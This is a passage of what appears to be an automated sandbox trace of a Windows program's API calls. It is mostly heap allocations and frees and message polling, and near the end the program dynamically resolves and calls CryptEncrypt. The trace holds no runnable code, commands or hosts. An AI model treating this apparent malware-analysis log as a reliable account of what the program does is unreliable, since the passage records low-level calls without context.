PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.935] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0262.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0262.935] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.936] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.937] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.938] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0262.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.939] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.939] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.939] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.940] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.940] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34ca540 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9fc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.948] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.949] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x182e1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x182e8) returned 1 [0262.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 